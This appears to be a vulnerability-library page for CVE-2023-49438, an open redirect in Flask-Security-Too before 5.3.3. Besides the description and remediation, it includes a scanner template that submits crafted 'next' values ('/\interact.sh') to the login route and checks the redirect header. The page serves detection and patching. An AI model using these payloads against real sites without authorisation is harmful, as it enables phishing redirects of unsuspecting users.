/Vulnerability Library

Python Flask-Security-Too <=5.3.2 - Open Redirect

CVE-2023-49438
Verified

Description

An open redirect vulnerability exists in the python package Flask-Security-Too prior to version 5.3.3. Attackers can abuse the 'next' parameter on the /login and /register routes to redirect unsuspecting users to malicious sites via crafted URLs, which could lead to phishing or other attacks ([NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-49438)).

Severity

Medium

CVSS Score

6.1

Exploit Probability

13%

Affected Product

flask-security-too

Published Date

April 21, 2026

Template Author

ritikchaddha

CVE-2023-49438.yaml
id: CVE-2023-49438

info:
  name: Python Flask-Security-Too <=5.3.2 - Open Redirect
  author: ritikchaddha
  severity: medium
  description: |
    An open redirect vulnerability exists in the python package Flask-Security-Too prior to version 5.3.3. Attackers can abuse the 'next' parameter on the /login and /register routes to redirect unsuspecting users to malicious sites via crafted URLs, which could lead to phishing or other attacks ([NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-49438)).
  impact: |
    Allows attackers to redirect users to arbitrary sites, potentially leading to phishing, data theft, or user session hijacking.
  remediation: |
    Upgrade Flask-Security-Too to version 5.3.3 or later to mitigate the open redirect vulnerability.
  reference:
    - https://github.com/Flask-Middleware/flask-security
    - https://github.com/brandon-t-elliott/CVE-2023-49438
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6HCYH377TPUMUHELPI36PDS2ZM4VFIXM/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-49438
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-49438
    cwe-id: CWE-601
    epss-score: 0.13041
    epss-percentile: 0.94178
    cpe: cpe:2.3:a:flask-security-too_project:flask-security-too:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: flask-security-too_project
    product: flask-security-too
  tags: cve2023,cve,redirect,flask,flask-security,redirect

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        next={{path}}&csrf_token={{csrftoken}}&email={{username}}&password={{password}}&submit=Login

    payloads:
      path:
        - /\interact.sh
        - \/interact.sh

    matchers:
      - type: regex
        part: header_2
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'

    extractors:
      - type: regex
        part: body
        name: csrftoken
        group: 1
        regex:
          - 'name="csrf-token" content="(.*)"'
        internal: true
# digest: 4b0a00483046022100c8e3034c97c799a510577f36ddd48f68aac7562d4df782207c65f2feebc9839c022100eebd0dd6a75166f6e138a08031cc2077a9b56516d1954a00389b4babe506e627:922c64590222798bb761d5b6d8e72950
6.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2023-49438
CWE ID:
cwe-601

References

https://github.com/Flask-Middleware/flask-securityhttps://github.com/brandon-t-elliott/CVE-2023-49438https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6HCYH377TPUMUHELPI36PDS2ZM4VFIXM/https://nvd.nist.gov/vuln/detail/CVE-2023-49438

Remediation Steps

Upgrade Flask-Security-Too to version 5.3.3 or later to mitigate the open redirect vulnerability.